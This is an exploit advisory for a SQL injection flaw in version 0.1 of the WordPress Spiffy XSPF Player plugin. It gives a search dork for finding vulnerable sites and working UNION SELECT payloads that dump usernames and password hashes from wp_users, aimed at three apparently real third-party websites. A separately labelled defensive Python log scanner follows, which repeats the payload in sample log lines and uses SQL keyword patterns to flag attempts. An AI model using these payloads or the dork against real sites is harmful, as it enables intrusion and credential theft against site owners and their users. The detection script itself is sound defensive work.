WordPress Spiffy XSPF Player third-party plugin version 0.1 suffers from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
##############
# Exploit Title : WordPress Spiffy XSPF Player plugin SQL Injection
#
# Exploit Author : Ashiyane Digital Security Team
#
# Home : www.ashiyane.org
#
# Security Risk : High
#
# Version : 0.1
#
# Dork : inurl:wp-content/plugins/spiffy/playlist.php?playlist_id=
#
##############
# Location: site/wp-content/plugins/spiffy/playlist.php?playlist_id=[SQL]
#
#
#DEm0:
# http://www.greatacoustics.org/wp-content/plugins/spiffy/playlist.php?playlist_id=-2+union+select+1,group_concat%28user_login,0x3a,user_pass%29,3,4,5+from+wp_users--
#
# http://www.animaterrasings.org/wp-content/plugins/spiffy/playlist.php?playlist_id=-7+union+select+1,group_concat%28user_login,0x3a,user_pass%29,3,4,5+from+wp_users--
#
# http://www.jaynekelly.com/wp-content/plugins/spiffy/playlist.php?playlist_id=-2+union+select+1,group_concat%28user_login,0x3a,user_pass%29,3,4,5+from+wp_users--
#
##############
#Greetz to: My Lord ALLAH
##############
#
# Amirh03in
#
##############
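
A defender-side check for the request pattern in this advisory, as an added example that is not part of the original advisory or the plugin's code: it scans web-server access logs for playlist.php requests whose playlist_id is not a plain integer. The combined log format, the rule that legitimate ids are integers, and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path and parameter as named in the advisory.
PLUGIN_PATH = "/wp-content/plugins/spiffy/playlist.php"
PARAM = "playlist_id"

# Client address and request target from a combined-format access log line.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# SQL tokens reported for triage; the allowlist below decides what is flagged.
SQL_TOKEN_RE = re.compile(r"\b(union|select|from|group_concat|wp_users)\b", re.I)

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.10 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-content/plugins/spiffy/playlist.php?playlist_id=2 HTTP/1.1" 200 812',
    '203.0.113.77 - - [01/Jan/2024:10:00:05 +0000] "GET /wp-content/plugins/spiffy/playlist.php?playlist_id=-2+union+select+1,group_concat%28user_login,0x3a,user_pass%29,3,4,5+from+wp_users-- HTTP/1.1" 200 1540',
    '203.0.113.12 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?playlist_id=abc HTTP/1.1" 200 100',
    '203.0.113.40 - - [01/Jan/2024:10:00:11 +0000] "GET /blog/wp-content/plugins/spiffy/playlist.php?playlist_id=7%27 HTTP/1.1" 500 0',
]


def inspect_line(line):
    """Return a finding for a playlist.php request with a non-integer id, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    # endswith() also covers WordPress installed in a subdirectory.
    if not url.path.lower().endswith(PLUGIN_PATH):
        return None
    # parse_qs percent-decodes values and turns '+' into spaces.
    for value in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
        # Allowlist: a legitimate playlist id is assumed to be a plain integer.
        if re.fullmatch(r"[0-9]+", value):
            continue
        tokens = sorted({t.lower() for t in SQL_TOKEN_RE.findall(value)})
        verdict = "sql-injection-attempt" if tokens else "non-integer-id"
        return {"ip": m.group("ip"), "value": value, "verdict": verdict, "tokens": tokens}
    return None


def scan(lines):
    """Collect findings for every suspicious line."""
    return [f for f in map(inspect_line, lines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Because the check is an allowlist on the decoded value rather than a keyword blocklist, encoded or obfuscated payloads are still flagged as non-integer ids even when no SQL token is recognised.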